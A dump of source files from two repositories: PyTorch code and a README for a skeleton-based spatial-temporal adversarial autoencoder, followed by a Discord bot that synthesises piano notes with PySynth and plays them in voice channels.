+ eps*std\n\n def inference(self, n=1, class_label = [0] ):\n \n batch_size = n\n\n z = torch.tensor(np.random.normal(0, 1, (batch_size, self.num_class )))\n \n if(self.is_cuda):\n z = z.cuda()\n \n recon_x = self.decoder(z)\n\n return recon_x\n\n\nclass Encoder(nn.Module):\n r\"\"\"Spatial temporal graph convolutional networks.\n\n Args:\n in_channels (int): Number of channels in the input data\n num_class (int): Number of classes for the classification task\n graph_args (dict): The arguments for building the graph\n edge_importance_weighting (bool): If ``True``, adds a learnable\n importance weighting to the edges of the graph\n **kwargs (optional): Other parameters for graph convolution units\n\n Shape:\n - Input: :math:`(N, in_channels, T_{in}, V_{in}, M_{in})`\n - Output: :math:`(N, num_class)` where\n :math:`N` is a batch size,\n :math:`T_{in}` is a length of input sequence,\n :math:`V_{in}` is the number of graph nodes,\n :math:`M_{in}` is the number of instance in a frame.\n \"\"\"\n\n def __init__(self, in_channels, num_class, graph_args,\n edge_importance_weighting = False, \n temporal_kernel_size = 9, **kwargs):\n \n super().__init__()\n\n # load graph\n self.graph = Graph(**graph_args)\n A = torch.tensor(self.graph.A, dtype = torch.float32, \n requires_grad = False)\n \n self.register_buffer('A', A)\n\n # build networks\n spatial_kernel_size = A.size(0)\n kernel_size = (temporal_kernel_size, spatial_kernel_size)\n\n self.data_bn = nn.BatchNorm1d(in_channels * A.size(1))\n\n self.encoder = nn.ModuleList((\n st_gcn(in_channels , 64 , kernel_size, 1, **kwargs),\n st_gcn(64 , 128 , kernel_size, 1, **kwargs),\n st_gcn(128 , 128 , kernel_size, 1, **kwargs)\n \n ))\n\n # initialize parameters for edge importance weighting\n if edge_importance_weighting:\n self.edge_importance = nn.ParameterList([\n nn.Parameter(torch.ones(self.A.size()))\n for i in self.encoder\n ])\n else:\n self.edge_importance = [1] * len(self.encoder)\n\n # fcn for encoding\n self.z_mean = nn.Conv2d(128, num_class, kernel_size=1)\n self.z_logvar = nn.Conv2d(128, num_class, kernel_size=1)\n\n def forward(self, x):\n N, C, T, V, M = x.size()\n \n #Data Norm\n x = x.permute(0, 4, 3, 1, 2).contiguous()\n x = x.view(N * M, V * C, T)\n x = self.data_bn(x)\n \n x = x.view(N, M, V, C, T)\n x = x.permute(0, 1, 3, 4, 2).contiguous()\n x = x.view(N * M, C, T, V)\n\n \n # forward\n for gcn, importance in zip(self.encoder, self.edge_importance):\n x, _ = gcn(x, self.A * importance)\n\n # global pooling\n x = F.avg_pool2d(x, x.size()[2:])\n \n # prediction\n mean = x.view(N, M, -1, 1 ,1).mean(dim = 1)\n \n mean = self.z_mean(mean)\n mean = mean.view(mean.size(0), -1)\n\n #latent value\n logvar = x.view(N*M, -1, 1, 1)\n \n logvar = self.z_logvar(logvar)\n logvar = logvar.view(logvar.size(0), -1)\n\n return mean, logvar\n\n\nclass Decoder(nn.Module):\n r\"\"\"Spatial temporal graph convolutional networks.\n\n Args:\n in_channels (int): Number of channels in the input data\n num_class (int): Number of classes for the classification task\n graph_args (dict): The arguments for building the graph\n edge_importance_weighting (bool): If ``True``, adds a learnable\n importance weighting to the edges of the graph\n **kwargs (optional): Other parameters for graph convolution units\n\n Shape:\n - Input: :math:`(N, in_channels, T_{in}, V_{in}, M_{in})`\n - Output: :math:`(N, num_class)` where\n :math:`N` is a batch size,\n :math:`T_{in}` is a length of input sequence,\n :math:`V_{in}` is the number of graph nodes,\n :math:`M_{in}` is the number of instance in a frame.\n \"\"\"\n\n def __init__(self, in_channels, num_class, T, V, \n graph_args, edge_importance_weighting = False, \n temporal_kernel_size = 9, **kwargs):\n \n super().__init__()\n\n # load graph\n self.graph = Graph(**graph_args)\n A = torch.tensor(self.graph.A, dtype = torch.float32, \n requires_grad = False)\n \n self.register_buffer('A', A)\n\n # build networks \n spatial_kernel_size = A.size(0)\n kernel_size = (temporal_kernel_size, spatial_kernel_size)\n\n\n self.fcn = nn.Sequential( \n nn.BatchNorm2d(num_class),\n nn.ConvTranspose2d(num_class, 128, kernel_size=(T,V)) ,\n nn.BatchNorm2d(128)\n )\n\n self.decoder = nn.ModuleList((\n st_gctn(128 , 128 , kernel_size, 1, **kwargs),\n st_gctn(128 , 64 , kernel_size, 1, **kwargs),\n st_gctn(64 , in_channels, kernel_size, 1, ** kwargs)\n ))\n\n # initialize parameters for edge importance weighting\n if edge_importance_weighting:\n self.edge_importance = nn.ParameterList([\n nn.Parameter(torch.ones(self.A.size()))\n for i in self.decoder\n ])\n else:\n self.edge_importance = [1] * len(self.decoder)\n\n #ouput Norm\n self.data_bn = nn.BatchNorm1d(in_channels * A.size(1))\n self.out = nn.Tanh()\n \n def forward(self, z):\n\n N,M,_ = z.size()\n\n z = z.view( N * M, -1, 1, 1 )\n \n # Deconvo spatial temporal\n z = self.fcn(z)\n \n _,C,T, V = z.size()\n\n\n # Deconvolution forward\n for gcn, importance in zip(self.decoder, self.edge_importance):\n z, _ = gcn(z, self.A * importance)\n\n # data normalization \n _, C, T, V, = z.size()\n \n # output norm\n z = z.view(N, M, C, T, V ).contiguous()\n z = z.permute(0, 1, 4, 2, 3).contiguous()\n\n z = z.view(N * M, V * C, T)\n z = self.data_bn(z)\n z = z.view(N, M, V, C, T)\n \n z = z.permute(0, 3, 4, 2, 1).contiguous()\n # z = self.out(z)\n\n return z\n\n\nif __name__ == '__main__':\n \n x=torch.randn(36,3,300,25,2).cuda()\n \n N, C, T, V, M = x.size()\n\n graph_args = {\"layout\":'ntu-rgb+d','strategy': \"uniform\"}\n \n m = CVAE(in_channels = 3, T = T, V = V, n_z = 32, \n graph_args = graph_args,\n edge_importance_weighting = True \n ).cuda()\n \n optimizer = torch.optim.SGD(m.parameters(), lr=0.01, momentum=0.9)\n lossF = nn.MSELoss()\n \n for i in range(10000):\n\n recon_x, mean, lsig, z = m(x)\n \n optimizer.zero_grad()\n loss = lossF(x, recon_x) \n \n optimizer.step()\n if (i % 100)==0:\n print(i,\" : \", loss.item())\n\n print(recon_x.shape)\n print(mean.shape)\n print(lsig.shape)\n print(z.shape)\n print(lossF(x, recon_x ))\n"
},
{
"alpha_fraction": 0.5160506963729858,
"alphanum_fraction": 0.5264618992805481,
"avg_line_length": 33.29166793823242,
"blob_id": "745f1f5a744df5561d77ebade87aee6dc3be119e",
"content_id": "f62e309486eb6fe31b4b7319f33b6bf0d53d8f08",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5763,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 168,
"path": "/net/subnet/st_gcn.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom net.subnet.tgcn import *\nfrom net.utils.graph import Graph\n\nclass st_gcn(nn.Module):\n r\"\"\"Applies a spatial temporal graph convolution over an input graph sequence.\n Args:\n in_channels (int): Number of channels in the input sequence data\n out_channels (int): Number of channels produced by the convolution\n kernel_size (tuple): Size of the temporal convolving kernel and graph convolving kernel\n stride (int, optional): Stride of the temporal convolution. Default: 1\n dropout (int, optional): Dropout rate of the final output. Default: 0\n residual (bool, optional): If ``True``, applies a residual mechanism. Default: ``True``\n\n Shape:\n - Input[0]: Input graph sequence in :math:`(N, in_channels, T_{in}, V)` format\n - Input[1]: Input graph adjacency matrix in :math:`(K, V, V)` format\n - Output[0]: Outpu graph sequence in :math:`(N, out_channels, T_{out}, V)` format\n - Output[1]: Graph adjacency matrix for output data in :math:`(K, V, V)` format\n\n where\n :math:`N` is a batch size,\n :math:`K` is the spatial kernel size, as :math:`K == kernel_size[1]`,\n :math:`T_{in}/T_{out}` is a length of input/output sequence,\n :math:`V` is the number of graph nodes.\n\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dropout=0,\n residual=True):\n super().__init__()\n\n assert len(kernel_size) == 2\n assert kernel_size[0] % 2 == 1\n padding = ((kernel_size[0] - 1) // 2, 0)\n\n self.gcn = ConvTemporalGraphical(in_channels, out_channels,\n kernel_size[1])\n\n self.tcn = nn.Sequential(\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(\n out_channels,\n out_channels,\n (kernel_size[0], 1),\n (stride, 1),\n padding,\n ),\n nn.BatchNorm2d(out_channels),\n nn.Dropout(dropout, inplace=True),\n )\n\n if not residual:\n self.residual = lambda x: 0\n\n elif (in_channels == out_channels) and (stride == 1):\n self.residual = lambda x: x\n\n else:\n self.residual = nn.Sequential(\n nn.Conv2d(\n in_channels,\n out_channels,\n kernel_size=1,\n stride=(stride, 1)),\n nn.BatchNorm2d(out_channels),\n )\n\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x, A):\n\n res = self.residual(x)\n x, A = self.gcn(x, A)\n x = self.tcn(x) + res\n\n return self.relu(x), A\n\n\nclass st_gctn(nn.Module):\n r\"\"\"Applies a spatial temporal graph convolution over an input graph sequence.\n Args:\n in_channels (int): Number of channels in the input sequence data\n out_channels (int): Number of channels produced by the convolution\n kernel_size (tuple): Size of the temporal convolving kernel and graph convolving kernel\n stride (int, optional): Stride of the temporal convolution. Default: 1\n dropout (int, optional): Dropout rate of the final output. Default: 0\n residual (bool, optional): If ``True``, applies a residual mechanism. Default: ``True``\n\n Shape:\n - Input[0]: Input graph sequence in :math:`(N, in_channels, T_{in}, V)` format\n - Input[1]: Input graph adjacency matrix in :math:`(K, V, V)` format\n - Output[0]: Outpu graph sequence in :math:`(N, out_channels, T_{out}, V)` format\n - Output[1]: Graph adjacency matrix for output data in :math:`(K, V, V)` format\n\n where\n :math:`N` is a batch size,\n :math:`K` is the spatial kernel size, as :math:`K == kernel_size[1]`,\n :math:`T_{in}/T_{out}` is a length of input/output sequence,\n :math:`V` is the number of graph nodes.\n\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dropout=0,\n residual=True):\n super().__init__()\n\n assert len(kernel_size) == 2\n assert kernel_size[0] % 2 == 1\n padding = ((kernel_size[0] - 1) // 2, 0)\n\n self.gctn = ConvTransposeTemporalGraphical(in_channels, out_channels,\n kernel_size[1])\n\n self.tcn = nn.Sequential(\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(\n out_channels,\n out_channels,\n (kernel_size[0], 1),\n (stride, 1),\n padding,\n ),\n nn.BatchNorm2d(out_channels),\n nn.Dropout(dropout, inplace=True),\n )\n\n if not residual:\n self.residual = lambda x: 0\n\n elif (in_channels == out_channels) and (stride == 1):\n self.residual = lambda x: x\n\n else:\n self.residual = nn.Sequential(\n nn.ConvTranspose2d(\n in_channels,\n out_channels,\n kernel_size=1,\n stride=(stride, 1)),\n nn.BatchNorm2d(out_channels),\n )\n\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x, A):\n\n res = self.residual(x)\n x, A = self.gctn(x, A)\n x = self.tcn(x) + res\n\n return self.relu(x), A\n\n\n"
},
{
"alpha_fraction": 0.6307228803634644,
"alphanum_fraction": 0.6427710652351379,
"avg_line_length": 48.55223846435547,
"blob_id": "6fd340e93e0cec0abfde4b3a0d29c6d066daf04b",
"content_id": "8c0423322815ce1f2a12e07b89347770fafde36b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3320,
"license_type": "permissive",
"max_line_length": 210,
"num_lines": 67,
"path": "/README.md",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "# Spatial Temporal Adversarial Autoencoder\n## Description\n Spatial Temporal Adversarial Autoencoder is a model that based on ST-GCN and AAE. The model is a multi task modal tha able to classify the action class, cluster the class of action and generate skeleton data.\n\n## Initialization\n### Pre-Installation\n The package for the model can be downlaod and install with the command:\n ```\n pip install --upgrade --force-reinstall -r requirements.txt\n ```\n Beside, torchlight module is used in the code and t can be install with te command:\n ```\n cd ./torchlight ; python setup.py install ; cd ..\n ```\n After That, restart of the terminal seasion is need to apply latest update of the installation\n### Dataset \n NTU RGB+D 120 Dataset ,can be download from URL: http://rose1.ntu.edu.sg/datasets/actionrecognition.asp\n \n For Data Extraction and preprocessing for the model, used the command:\n ```\n pyhon ./data_gen/<type of dataset generator> --path <path of the skeleton data of the dataset>\n # <type of dataset generator> = ntu5_gendata.py for dataset with 5 action classes\n # = ntu20_gendata.py for dataset with 20 action classes\n # = ntu120_gendata.py for dataset with 120 action classes which is the wwhole set\n ```\n### Pre-Training model\n The weight of the model can be download from the Drive:\n URL: https://drive.google.com/drive/folders/1X8vj9tTy8rfos5M_id_LeLDtPWdQQ0ZR?usp=sharing\n \n In the drive is the working diractory of the ST-AAE, which the layout will be /<dataset>/<Test Name>/.\n ```\n <dataset> = xset_5 (The working directory of dataset NTU5 in cross setup) \n = xsub_5 (The working directory of dataset NTU5 in cross subject)\n = xset_20 (The working directory of dataset NTU20 in cross setup)\n = xsub_20 (The working directory of dataset NTU20 in cross subject)\n = st-gcn_5 (The working directory of dataset NTU5 for ST-GCN)\n = st-gcn_20 (The working directory of dataset NTU20 for ST-GCN)\n ```\n ```\n <Test Name> = Final (Supervised Learning of ST-AAE)\n = Final_unsuperviser (Unsupervised Learning of ST-AAE)\n = others (testing on different setting)\n ```\n \n## ST-AAE\n### Run Model \n For run supervised learning model :\n ```\n python main_supervised.py --config \"./config/<dataset config>/train.yaml\" \n --work_dir <output working directory>\n --weights <path of the model weights file which use to load the save weight of model>\n ```\n \n For run unsupervised learning model :\n ```\n python main_unsupervised.py --config \"./config/<dataset config>/train.yaml\" \n --work_dir <output working directory>\n --weights <path of the model weights file which use to load the save weight of model>\n ```\n \n### Display The Skeleton Data\n Display the Skeleton data and Reconstructed skeleton data with commmand:\n ```\n python display_data.py --data <path of original data file>\n --recon <path of the reconstructed data file>\n --save <True for save all the figure per frame, default = False>\n ```\n"
},
{
"alpha_fraction": 0.620396614074707,
"alphanum_fraction": 0.6288951635360718,
"avg_line_length": 22.600000381469727,
"blob_id": "dd599d5be5e88ec50d97286ae1027e2c38090865",
"content_id": "ebc80a81301db7621a09eeb24bd07b832eb5c0c4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 353,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 15,
"path": "/main_unsupervised.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "import sys\nimport os\nfrom processor.recognition_cluster import REC_Processor\n\ndef import_class(name):\n components = name.split('.')\n mod = __import__(components[0])\n for comp in components[1:]:\n mod = getattr(mod, comp)\n return mod\n\nif __name__ == \"__main__\":\n \n processor = REC_Processor(sys.argv[1:])\n processor.start()"
},
{
"alpha_fraction": 0.5093348622322083,
"alphanum_fraction": 0.5198416113853455,
"avg_line_length": 35.709197998046875,
"blob_id": "11b9230c2ccac6f9f526c00d10cc8fd64b432a24",
"content_id": "247172ed44514f92fa9dd929c9512c907c437fbe",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12373,
"license_type": "permissive",
"max_line_length": 148,
"num_lines": 337,
"path": "/processor/recognition.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# pylint: disable=W0201\n\nimport sys\n# sys.path.extend(['../'])\n\nimport argparse\nimport yaml\nimport numpy as np\nimport time\nimport itertools\nimport os\n\n# torch\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\n# torchlight\nimport torchlight\nfrom torchlight import str2bool\nfrom torchlight import DictAction\nfrom torchlight import import_class\n\nfrom .processor import Processor\n\ntorch.set_printoptions(threshold=5000)\n\ndef weights_init(m): \n classname = m.__class__.__name__\n \n if classname.find('Conv1d') != -1:\n m.weight.data.normal_(0.0, 0.02)\n \n if m.bias is not None:\n m.bias.data.fill_(0)\n \n elif classname.find('Conv2d') != -1:\n m.weight.data.normal_(0.0, 0.02)\n \n if m.bias is not None:\n m.bias.data.fill_(0)\n \n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\nclass REC_Processor(Processor):\n \"\"\"\n Processor for Skeleton-based Action Recgnition\n \"\"\"\n\n def loss(self,recon_x, x,label, cat_y, logvar):\n \n args = {\"reduction\" : \"mean\"}\n\n\n weight = torch.tensor([1, 1, 1, 1, 1],requires_grad=False).to(self.dev)\n\n N,C,T,V,M = x.size()\n \n #spatial loss & pos\n recon_loss = weight[0] * nn.functional.mse_loss(recon_x, x,**args)\n\n #velocity loss \n t1 = x[:, :, 1:] - x[:, :, :-1]\n t2 = recon_x[:, :, 1:] - recon_x[:, :, :-1]\n\n recon_loss += weight[1] * nn.functional.mse_loss(t1, t2, **args)\n\n #acceleration loss\n a1 = x[:, :, 2:] - 2 * x[:, :, 1:-1] + x[:, :, :-2]\n a2 = recon_x[:, :, 2:] - 2 * recon_x[:, :, 1:-1] + recon_x[:, :, :-2]\n\n recon_loss += weight[2] * nn.functional.mse_loss(a1, a2, **args)\n \n #catogory loss(classify loss)\n cat_loss = F.cross_entropy(cat_y, label, **args )\n cat_loss = weight[3] * cat_loss\n\n # Discriminator loss\n valid = Variable( torch.zeros( cat_y.shape[0] , 1 ).fill_(1.0), requires_grad=False ).float().to(self.dev)\n d_loss = F.binary_cross_entropy(self.model.y_discriminator(cat_y) , valid, **args )\n\n valid = Variable( torch.zeros( logvar.shape[0] , 1 ).fill_(1.0), requires_grad=False ).float().to(self.dev)\n d_loss += F.binary_cross_entropy(self.model.z_discriminator(logvar), valid,**args )\n \n d_loss = weight[4] * d_loss\n\n \n # KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp(),1).mean()\n \n return (recon_loss + cat_loss + d_loss) / (weight.sum()) , cat_loss * weight[3]\n\n def load_model(self):\n \n self.model = self.io.load_model(self.arg.model, **(self.arg.model_args))\n self.model.apply(weights_init)\n\n def load_optimizer(self):\n \n if( self.arg.optimizer == 'SGD'):\n self.optimizer = dict() \n \n self.optimizer[\"autoencoder\"] = optim.SGD(\n itertools.chain(self.model.encoder.parameters(), self.model.parameters()),\n lr = self.arg.base_lr,\n momentum = 0.9,\n nesterov = self.arg.nesterov,\n weight_decay = self.arg.weight_decay\n )\n\n self.optimizer[\"y_discriminator\"] = optim.SGD(\n self.model.y_discriminator.parameters(),\n lr = self.arg.base_lr,\n momentum = 0.9,\n nesterov = self.arg.nesterov,\n weight_decay = self.arg.weight_decay\n )\n\n self.optimizer[\"z_discriminator\"] = optim.SGD(\n self.model.z_discriminator.parameters(),\n lr = self.arg.base_lr,\n momentum = 0.9,\n nesterov = self.arg.nesterov,\n weight_decay = self.arg.weight_decay\n )\n\n elif( self.arg.optimizer == 'Adam'):\n self.optimizer = dict()\n\n self.optimizer[\"autoencoder\"] = optim.Adam(\n itertools.chain(self.model.encoder.parameters(), self.model.parameters()),\n lr = self.arg.base_lr,\n weight_decay = self.arg.weight_decay\n )\n\n self.optimizer[\"y_discriminator\"] = optim.Adam(\n self.model.y_discriminator.parameters(),\n lr = self.arg.base_lr,\n weight_decay = self.arg.weight_decay\n )\n \n self.optimizer[\"z_discriminator\"] = optim.Adam(\n self.model.z_discriminator.parameters(),\n lr = self.arg.base_lr,\n weight_decay = self.arg.weight_decay\n )\n else:\n raise ValueError()\n\n def adjust_lr(self):\n\n if self.arg.step:\n lr = self.arg.base_lr * ( 0.1 ** np.sum( self.meta_info['epoch'] >= np.array(self.arg.step)))\n \n for name, optimizer in self.optimizer.items():\n \n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n \n self.lr = lr\n\n def show_topk(self, k):\n rank = self.result.argsort()\n\n hit_top_k = [ l in rank[i, -k:] for i, l in enumerate(self.label)]\n \n accuracy = sum(hit_top_k) * 1.0 / len(hit_top_k)\n \n self.io.print_log('\\tTop{}: {:.2f}%'.format(k, 100 * accuracy))\n\n def train(self):\n self.model.train()\n self.adjust_lr()\n self.meta_info['iter'] = 0\n self.io.record_time()\n\n loader = self.data_loader['train']\n loss_value = []\n \n for data, label in loader:\n\n # get data\n data = data.float().to(self.dev)\n label = label.long().to(self.dev)\n \n N,C,T,V,M = data.size()\n \n # forward\n recon_data, cat_y, latent_z, z = self.model(data)\n\n # autoencoder loss\n loss, cat_loss = self.loss(recon_data, data, label , cat_y, latent_z)\n \n # backward\n self.optimizer[\"autoencoder\"].zero_grad()\n loss.backward()\n self.optimizer[\"autoencoder\"].step()\n\n # cat_y discriminator train\n valid = Variable(torch.zeros(label.shape[0], 1 ).fill_(1.0), requires_grad=False).float().to(self.dev)\n fake = Variable(torch.zeros(label.shape[0], 1 ).fill_(0.0), requires_grad=False).float().to(self.dev)\n \n one_hot_label = F.one_hot(label, num_classes = self.model.num_class).float().to(self.dev)\n\n y_loss = F.binary_cross_entropy(self.model.y_discriminator(one_hot_label.detach()) , valid )\n y_loss += F.binary_cross_entropy(self.model.y_discriminator(cat_y.detach()) , fake )\n y_loss = y_loss * 0.5\n \n self.optimizer[\"y_discriminator\"].zero_grad()\n y_loss.backward()\n self.optimizer[\"y_discriminator\"].step()\n \n # latent_z discriminator train\n valid = Variable(torch.zeros(latent_z.shape[0], 1 ).fill_(1.0), requires_grad=False).float().to(self.dev)\n fake = Variable(torch.zeros(latent_z.shape[0], 1 ).fill_(0.0), requires_grad=False).float().to(self.dev)\n\n sample_z = torch.randn_like( latent_z, requires_grad=False )\n\n z_loss = F.binary_cross_entropy(self.model.z_discriminator(sample_z.detach()) , valid )\n z_loss += F.binary_cross_entropy(self.model.z_discriminator(latent_z.detach() ) , fake )\n z_loss = z_loss * 0.5\n\n self.optimizer[\"z_discriminator\"].zero_grad()\n z_loss.backward()\n self.optimizer[\"z_discriminator\"].step()\n\n #get matched\n (values, indices) = cat_y.max(dim=1)\n\n # statistics\n self.iter_info['loss'] = loss.data.item()\n self.iter_info['cat_loss'] = cat_loss.data.item()\n self.iter_info['acc'] = \"{} / {}\".format( (label == indices).sum().data.item() , len(label) )\n \n self.iter_info['y_loss'] = y_loss.data.item()\n self.iter_info['z_loss'] = z_loss.data.item()\n self.iter_info['lr'] = '{:.6f}'.format(self.lr)\n self.iter_info['time'] = '{:.6f}'.format(int(time.time() - self.io.cur_time))\n \n loss_value.append( self.iter_info['loss'] )\n \n self.show_iter_info()\n self.meta_info['iter'] += 1\n \n print(indices.view(-1))\n print(label.view( -1 ))\n print((label == indices).sum(),len(label) )\n \n if(not os.path.exists(self.io.work_dir + \"/result\")):\n os.makedirs(self.io.work_dir + \"/result/\")\n\n np.save(self.io.work_dir + \"/result/data{}.npy\".format(self.meta_info[\"epoch\"]),data.cpu().numpy())\n np.save(self.io.work_dir + \"/result/recon{}.npy\".format(self.meta_info[\"epoch\"]),recon_data.detach().cpu().numpy())\n \n self.epoch_info['mean_loss']= np.mean(loss_value)\n self.show_epoch_info()\n self.io.print_timer()\n\n def test(self, evaluation=True):\n\n self.model.eval()\n\n loader = self.data_loader['test']\n loss_value = []\n result_frag = []\n label_frag = []\n\n for data, label in loader:\n \n # get data\n data = data.float().to(self.dev)\n label = label.long().to(self.dev)\n \n # evaluation\n with torch.no_grad():\n recon_data, cat_y, latent_z, z = self.model(data)\n \n result_frag.append(cat_y.data.cpu().numpy())\n \n # get loss\n if evaluation:\n\n loss, cat_loss = self.loss( recon_data, data, label, cat_y, latent_z)\n loss_value.append( loss.data.item() )\n label_frag.append( label.data.cpu().numpy() )\n\n if(not os.path.exists(self.io.work_dir + \"/result\")):\n os.makedirs(self.io.work_dir + \"/result/\")\n\n np.save(self.io.work_dir + \"/result/eval_data{}.npy\".format(self.meta_info[\"epoch\"]),data.cpu().numpy())\n np.save(self.io.work_dir + \"/result/eval_recon{}.npy\".format(self.meta_info[\"epoch\"]),recon_data.detach().cpu().numpy())\n\n self.result = np.concatenate( result_frag )\n \n if(evaluation):\n self.io.print_log(\"Evaluation {}:\".format(self.meta_info[\"epoch\"]))\n \n self.label = np.concatenate( label_frag )\n self.epoch_info['label'] = self.label\n self.epoch_info['mean_loss'] = np.mean( loss_value )\n self.show_epoch_info()\n\n # show top-k accuracy\n for k in self.arg.show_topk:\n self.show_topk( k )\n\n @staticmethod\n def get_parser(add_help = False ):\n\n # parameter priority: command line > config > default\n parent_parser = Processor.get_parser(add_help = False )\n \n parser = argparse.ArgumentParser(\n add_help = add_help,\n parents = [ parent_parser ],\n description = 'Spatial Temporal Graph Convolution Network' \n )\n\n # region arguments yapf: disable\n \n # evaluation\n parser.add_argument('--show_topk' , type=int , default=[1, 5], nargs='+' , help='which Top K accuracy will be shown')\n \n # optim\n parser.add_argument('--base_lr' , type=float , default=0.01 , help='initial learning rate')\n parser.add_argument('--step' , type=int , default=[] , nargs='+' , help='the epoch where optimizer reduce the learning rate')\n parser.add_argument('--optimizer' , default='SGD' , help='type of optimizer')\n parser.add_argument('--nesterov' , type=str2bool , default=True , help='use nesterov or not')\n parser.add_argument('--weight_decay', type=float , default=0.0001 , help='weight decay for optimizer')\n \n # endregion yapf: enable\n\n return parser\n\n\n"
}
] | 9 |
MasonAsh/dispiano
|
https://github.com/MasonAsh/dispiano
|
0d89e9e9aa191aae3dc6638dbdbfbccfb67c0890
|
d8e665e75919f504fe9c60edd96235645c4304eb
|
9a5a72c2dd6b290db9459ce2c9cb72c2000caf6e
|
refs/heads/master
| 2022-11-24T16:51:23.370217 | 2022-11-18T15:27:23 | 2022-11-18T15:27:23 | 130,544,050 | 5 | 1 |
MIT
| 2018-04-22T07:11:54 | 2022-08-25T01:30:09 | 2022-11-18T15:27:24 |
Python
|
[
{
"alpha_fraction": 0.5798165202140808,
"alphanum_fraction": 0.6660550236701965,
"avg_line_length": 24.952381134033203,
"blob_id": "6bc553bdd7ef1ce74edbcb0cd2021da088a02947",
"content_id": "ffd266cdaf359e5bb7f5d2f613b103d06b4c1227",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1091,
"license_type": "permissive",
"max_line_length": 285,
"num_lines": 42,
"path": "/README.md",
"repo_name": "MasonAsh/dispiano",
"src_encoding": "UTF-8",
"text": "# dispiano\nA discord bot for playing music notes.\n\ndispiano utilizes the pysynth library to create audio from musical notes.\n\n### Example command:\n\n```\nBach: Bourrée (from BWV 996)\n!piano e,8 f#,8 g,4 F#,8 e,8 d#,4 e,8 f#,8 b3,4 c#,8 d#,8 e,4 d,8 c,8 b3,4 c#,8 d#,8 e,4 d,8 c,8 b3,4 a3,8 g3,8 f#3,4 g3,8 a3,8 b3,8 a3,8 g3,8 f#3,8 e3,4 e,8 f#,8 g,4 f#,8 e,8 d#,4 e,8 f#,8 b3,4 c#,8 d#,8 e,4 d,8 c,8 b3,4 a3,8 g3,8 f#3,32 g3,32 f#3,32 g3,32 f#3,32 g3,32 f#3,6 g3,8 g3*\n```\n\n### Usage:\n\nTo use dispiano you need to create a bot for discord and then generate a token:\n\nhttps://github.com/reactiflux/discord-irc/wiki/Creating-a-discord-bot-&-getting-a-token\n\nThen add the bot to your server:\n\nhttps://github.com/jagrosh/MusicBot/wiki/Adding-Your-Bot-To-Your-Server\n\nNext you need to install the dependencies:\n\n* __discord.py__\n\n ```python3 -m pip install -U discord.py```\n\n* __PySynth__\n\n Download the stable release from:\n https://mdoege.github.io/PySynth/#d\n\n then run setup.py:\n\n ```python3 setup.py install```\n \nNow you can run dispiano:\n\n```\npython3 dispiano.py <YOUR_TOKEN_HERE>\n```\n"
},
{
"alpha_fraction": 0.5219805836677551,
"alphanum_fraction": 0.529847264289856,
"avg_line_length": 23.011110305786133,
"blob_id": "f8779cf80bcc46ea4dbd19f0dacdb6004a954183",
"content_id": "c9ca13dda98574c0c965553279c6ff572ff286ae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2161,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 90,
"path": "/dispiano.py",
"repo_name": "MasonAsh/dispiano",
"src_encoding": "UTF-8",
"text": "import discord\nimport pysynth as psb\nimport sys\nimport asyncio\n\n\nclient = discord.Client(intents=discord.Intents.all())\ncommand_lock = asyncio.Lock()\n\n\ndef parse_client_message_content(message):\n tokens = message.split()\n # Strip the \"!piano\"\n tokens = tokens[1:]\n\n bpm = 110\n\n try:\n bpm = int(tokens[0])\n tokens = tokens[1:]\n except:\n pass\n\n bpm = max(30, min(800, bpm))\n\n song = []\n\n for token in tokens:\n note = token\n length = 4\n if ',' in token:\n parts = token.split(',')\n note = parts[0].lower()\n length = float(parts[1])\n song.append((note.lower(), length))\n\n return (song, bpm)\n\n\[email protected]\nasync def on_message(message):\n if message.content.startswith('!piano'):\n await command_lock.acquire()\n if message.author.voice is None:\n await message.channel.send(\n 'Hey dumb dumb! ' +\n 'You need to be in a voice channel to use this bot.')\n command_lock.release()\n return\n\n try:\n song, bpm = parse_client_message_content(message.content)\n except:\n await message.channel.send(\n 'Hey dumb dumb! ' +\n 'Your notes are malformed!')\n command_lock.release()\n return\n\n try:\n psb.make_wav(song, fn=\"out.wav\", bpm=bpm)\n except:\n await message.channel.send(\n 'Hey dumb dumb! ' +\n 'Your notes are malformed!')\n command_lock.release()\n return\n\n try:\n voice = await message.author.voice.channel.connect()\n\n player = discord.FFmpegPCMAudio('out.wav')\n voice.play(player)\n\n while voice.is_playing():\n await asyncio.sleep(1)\n finally:\n await voice.disconnect()\n command_lock.release()\n\ndef main():\n if len(sys.argv) == 2:\n token = sys.argv[1]\n client.run(token)\n else:\n print(\"Error: must pass in your bot's token as a command line argument!\")\n\n\nif 